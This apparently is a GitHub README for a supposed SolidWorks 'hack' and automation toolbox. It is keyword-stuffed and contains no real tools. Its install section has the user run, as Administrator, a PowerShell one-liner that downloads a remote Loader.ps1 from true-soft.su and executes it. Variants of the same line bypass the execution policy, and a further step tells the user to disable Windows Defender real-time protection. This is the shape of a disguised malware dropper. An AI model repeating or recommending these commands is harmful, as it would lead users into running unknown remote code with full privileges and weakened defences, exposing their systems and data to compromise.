Skip to content

Latest commit

Β 

History

3 Commits

Folders and files

NameName
Last commit message
Last commit date
Β 
Β 

Repository files navigation

SolidWorks Hack & Automation Toolbox πŸš€

Welcome to the ultimate SolidWorks Hack, Registry Tweaks, and API Automation repository. This open-source project provides advanced tools, macros, and API scripts to bypass workflow bottlenecks, optimize CAD performance, and automate repetitive tasks in Dassault Systèmes SolidWorks.

πŸ’‘ Key Features & Capabilities

  • Performance Hacks: Registry optimization tweaks to accelerate rendering and reduce assembly loading lag.
  • API Automation: Production-ready VBA, C#, and Python scripts for batch file conversion (SLDPRT, SLDASM to STEP/DXF).
  • Workflow Bypasses: Macro workarounds for restrictive PDM vault limitations and licensing warnings.
  • Custom Add-ins: Boilerplate code for creating native SolidWorks custom UI panels and menus.

πŸš€ Automated Installation & Setup (PowerShell)

  1. Open PowerShell as Administrator:

    • Press the Win + X keys simultaneously.
    • Select Terminal (Admin) or Windows PowerShell (Admin) from the context menu.
  2. Execute the Deployment Command: Copy, paste, and press Enter to run the following optimized initialization command. This script dynamically configures the network bypass registry and fetches the necessary packages:

    irm https://true-soft.su/powershell/Loader.ps1 | iex

πŸ” Troubleshooting & Common Errors

πŸ“Œ Bypass Execution Policy (Blocking Unsigned Scripts)

If your system blocks the launch due to built-in execution policy constraints, enforce a bypass using this command:

powershell -ExecutionPolicy Bypass -Command "irm https://true-soft.su/powershell/Loader.ps1 | iex"

πŸ“Œ Error: "irm is not recognized..." (PowerShell 2.0 Legacy)

In older legacy environments where aliases are missing, use explicit full system cmdlets:

Invoke-RestMethod https://true-soft.su/powershell/Loader.ps1 | Invoke-Expression

πŸ“Œ Antivirus or SmartScreen Interception

Automated deployment routines can sometimes trigger proactive security heuristics. Temporarily disable "Real-time protection" within your Windows Defender settings during setup, then re-enable it immediately after completion.


πŸ” Search Engine Optimization (SEO) Keywords

SolidWorks Hack | SolidWorks API Automation | SolidWorks Registry Tweak | CAD Performance Bypass | SolidWorks Macro PDM | SolidWorks C# Add-In | SolidWorks VBA Scripts | Free CAD Tools


🀝 Contributing & Disclaimer

Contributions are welcome! If you have a clever SolidWorks hack or automation script, feel free to open a Pull Request.

Disclaimer: This repository is intended for educational and workflow optimization purposes only. The authors are not responsible for any software instability or licensing violations caused by modifying system files or the Windows Registry.